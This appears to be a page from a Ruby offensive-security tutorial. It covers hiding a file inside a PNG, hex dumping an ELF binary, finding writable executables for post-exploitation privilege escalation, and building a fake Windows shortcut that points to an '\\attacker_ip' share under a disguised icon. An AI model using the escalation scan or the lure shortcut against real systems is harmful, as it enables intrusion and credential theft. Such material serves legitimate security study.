File manipulation

Simple Steganography

A simple script that hides a file (file.pdf) inside an image (image.png) by writing both into steg.png, which still opens as the original image.png. It then recovers file.pdf from steg.png as hola.pdf.
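#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
#
# Hide one file inside another (e.g. a PDF inside a PNG) by appending it after
# the cover file, then recover it again. Image viewers ignore trailing bytes,
# so steg.png still renders like the cover image.
#
# Usage: ruby steg.rb <secret file> <cover file>
#
# Layout of steg.png:
#   <cover bytes><marker><secret bytes><8-byte big-endian secret size>
# The size trailer makes recovery exact even if the marker happens to occur
# inside the cover or the secret, and even if the secret is empty.
secret_path, cover_path = ARGV
abort "usage: #{$0} <secret file> <cover file>" unless secret_path && cover_path

# binread keeps every byte as-is: no newline conversion, no encoding checks.
sec_file = File.binread(secret_path) # 'file.pdf'
nor_file = File.binread(cover_path)  # 'image.png'
sep = '*------------------------*'
size_trailer = [sec_file.bytesize].pack('Q>')

# Write cover, marker, secret and size trailer back-to-back into steg.png.
# `write` (not `puts`) avoids inserting newlines that would end up in the
# recovered file.
File.open('steg.png', 'wb') do |stg|
  [nor_file, sep, sec_file, size_trailer].each { |chunk| stg.write(chunk) }
end

# Recover the secret: read its size from the trailer, then take exactly that
# many bytes immediately before the trailer.
data = File.binread('steg.png')
secret_size = data.byteslice(-8, 8).unpack('Q>').first
recov_file = data.byteslice(data.bytesize - 8 - secret_size, secret_size)

# Write the recovered bytes to hola.pdf
File.binwrite('hola.pdf', recov_file)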
Note: This has nothing to do with bypassing AV.

Simple Binary file to Hex

hex-simple.rb
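#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
# Simple file to hex converter script
#
# Usage: ruby hex-simple.rb <file>
# Prints the file's bytes as one "\xNN\xNN..." string.
file_name = ARGV[0]
abort "usage: #{$0} <file>" unless file_name

# binread reads the whole file in binary mode and closes it for us
# (File.open without a block would leave the handle open until GC).
# '\x%02x' is single-quoted, so the backslash is literal: each byte becomes
# "\x" followed by two lowercase hex digits.
file2hex = File.binread(file_name).each_byte.map { |b| '\x%02x' % b }.join

puts file2hex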
ruby hex-simple.rb ../assembly/hellolinux
Or, as a single command line:
ruby -e "puts File.open('hellolinux').read.each_byte.map { |b| '\x%02X' % b }.join"
return
\x7F\x45\x4C\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x80\x80\x04\x08\x34\x00\x00\x00\xCC\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xA2\x00\x00\x00\xA2\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\xA4\x00\x00\x00\xA4\x90\x04\x08\xA4\x90\x04\x08\x0E\x00\x00\x00\x0E\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x04\x00\x00\x00\xBB\x01\x00\x00\x00\xB9\xA4\x90\x04\x08\xBA\x0D\x00\x00\x00\xCD\x80\xB8\x01\x00\x00\x00\xBB\x00\x00\x00\x00\xCD\x80\x00\x00\x48\x65\x6C\x6C\x6F\x2C\x20\x57\x6F\x72\x6C\x64\x21\x0A\x00\x2E\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2E\x74\x65\x78\x74\x00\x2E\x64\x61\x74\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x80\x80\x04\x08\x80\x00\x00\x00\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\xA4\x90\x04\x08\xA4\x00\x00\x00\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB2\x00\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00
Note: if you want to change the hex prefix from \x to something else, just change '\x%x' to whatever you want, or remove it.

Simple Hexdump

hexdump.rb
#!/usr/bin/env ruby
#
# Source: http://c2.com/cgi/wiki?HexDumpInManyProgrammingLanguages
#
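# Print a classic hex dump of `filename` to $stdout.
#
# Each output line is "<6-digit hex offset> <width hex byte pairs> <ascii>";
# bytes outside 32..126 are shown as '.' in the ascii column.
#
# @param filename [String] file to dump (opened in binary mode)
# @param start    [Integer] offset of the first byte to print
# @param finish   [Integer, nil] offset of the last byte to print (inclusive);
#                 nil dumps to end of file
# @param width    [Integer] bytes per line
# @raise [SystemCallError] if the file cannot be opened (e.g. Errno::ENOENT);
#        the original version silently swallowed this with `rescue :done`
def hexdump(filename, start = 0, finish = nil, width = 16)
  ascii = ''.dup
  counter = 0
  print '%06x ' % start
  # Block form closes the file; 'rb' avoids newline translation on Windows.
  File.open(filename, 'rb') do |io|
    io.each_byte do |c|
      if counter >= start
        print '%02x ' % c
        ascii << (c.between?(32, 126) ? c : ?.)
        if ascii.length >= width
          puts ascii
          ascii = ''.dup
          print '%06x ' % (counter + 1)
        end
      end
      # `break` leaves each_byte cleanly instead of throw/rescue control flow.
      break if finish && finish <= counter
      counter += 1
    end
  end
  # Each missing byte on a partial last line is 3 columns ("xx "), so pad by
  # 3 per byte to keep the ascii column aligned with full lines.
  puts ' ' * (3 * (width - ascii.length)) + ascii
end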
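# Script entry point: dump the named file, or this script itself when no
# arguments are given. Extra arguments are start, finish and width, in that
# order. Integer() rejects non-numeric values instead of silently turning
# them into 0 the way to_i does.
if $0 == __FILE__
  if ARGV.empty?
    hexdump $0
  else
    filename, *numeric_args = ARGV
    begin
      numbers = numeric_args.map { |arg| Integer(arg, 10) }
    rescue ArgumentError
      abort "usage: #{$0} [file [start [finish [width]]]]"
    end
    hexdump filename, *numbers
  end
end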
ruby hexdump.rb hellolinux
return
000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 .ELF............
000010 02 00 03 00 01 00 00 00 80 80 04 08 34 00 00 00 ............4...
000020 cc 00 00 00 00 00 00 00 34 00 20 00 02 00 28 00 ........4. ...(.
000030 04 00 03 00 01 00 00 00 00 00 00 00 00 80 04 08 ................
000040 00 80 04 08 a2 00 00 00 a2 00 00 00 05 00 00 00 ................
000050 00 10 00 00 01 00 00 00 a4 00 00 00 a4 90 04 08 ................
000060 a4 90 04 08 0e 00 00 00 0e 00 00 00 06 00 00 00 ................
000070 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000080 b8 04 00 00 00 bb 01 00 00 00 b9 a4 90 04 08 ba ................
000090 0d 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 ................
0000a0 cd 80 00 00 48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 ....Hello, World
0000b0 21 0a 00 2e 73 68 73 74 72 74 61 62 00 2e 74 65 !...shstrtab..te
0000c0 78 74 00 2e 64 61 74 61 00 00 00 00 00 00 00 00 xt..data........
0000d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0000e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0000f0 00 00 00 00 0b 00 00 00 01 00 00 00 06 00 00 00 ................
000100 80 80 04 08 80 00 00 00 22 00 00 00 00 00 00 00 ........".......
000110 00 00 00 00 10 00 00 00 00 00 00 00 11 00 00 00 ................
000120 01 00 00 00 03 00 00 00 a4 90 04 08 a4 00 00 00 ................
000130 0e 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................
000140 00 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00 ................
000150 00 00 00 00 b2 00 00 00 17 00 00 00 00 00 00 00 ................
000160 00 00 00 00 01 00 00 00 00 00 00 00 ............

Finding weak file permissions

One of the important post-exploitation tasks is finding executable files with weak permissions that might be executed by the root/administrator user, so that we can try to elevate our privileges on the system. At the same time, our scripts must work on all systems.
find777.rb
# KING SABRI | @KINGSABRI
# Find all executable, writable files in the path
#
require 'find'
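# Root of the tree to scan. Fail early with a usage message instead of letting
# Find.find raise a TypeError on a nil path or Errno::ENOENT on a missing one.
path = ARGV[0]
abort "usage: #{$0} <path>" unless path && File.exist?(path)

# Lazy enumerator over every path under `path`. Find.find skips directories it
# cannot read by default (ignore_error: true), so an unreadable subtree does
# not abort the whole scan.
search = Find.find(path)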
# Filter `search` (any enumerable of path strings, e.g. a Find.find enumerator)
# down to regular files that the *current* user can both write and execute.
#
# File.writable?/File.executable? test the effective uid/gid of the running
# process, so the result differs between a root and a non-root run; check the
# mode bits from File.stat if "world-writable" is what you are after.
#
# @param search [Enumerable<String>] candidate paths
# @return [Array<String>] the matching paths, in the order they were given
def wx_file(search)
  search.select do |file|
    next false unless File.file?(file)

    File.executable?(file) && File.writable?(file)
  end
end
# One matching path per line (Kernel#puts writes to $stdout; an empty result
# still prints a blank line, exactly as before).
$stdout.puts wx_file(search)
You can also search for read, write and execute permissions for everyone (mode 777); the iteration block would then look like:
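# Keep only entries whose permission bits are exactly rwxrwxrwx. Masking the
# mode with 0o777 is clearer than slicing the octal string and gives the same
# answer when setuid/setgid/sticky bits are also set.
# File.stat follows symlinks and raises Errno::ENOENT on a dangling one.
search.select do |file|
  (File.stat(file).mode & 0o777) == 0o777
end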

Create Fake Windows shortcut

Install win32-shortcut gem
gem install win32-shortcut
Note: this example works only on Windows, since it uses Windows APIs.
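# KING SABRI | @KINGSABRI
# gem install win32-shortcut
#
# Windows only: the gem wraps the Windows shell-link APIs.
# The gem's require path is 'win32/shortcut' ('win32/shotcut' was a typo and
# raises LoadError).
require 'win32/shortcut'
include Win32

# NOTE(review): no .lnk file name is passed to Shortcut.new, so this snippet
# alone does not show whether anything is written to disk; check the gem's
# documentation for how and when the shortcut is saved.
Shortcut.new do |s|
  s.description = 'Rubyfu'
  s.path = '\\attacker_ip\rubyfu.png'
  s.show_cmd = Shortcut::SHOWNORMAL
  s.icon_location = 'notepad.exe'
end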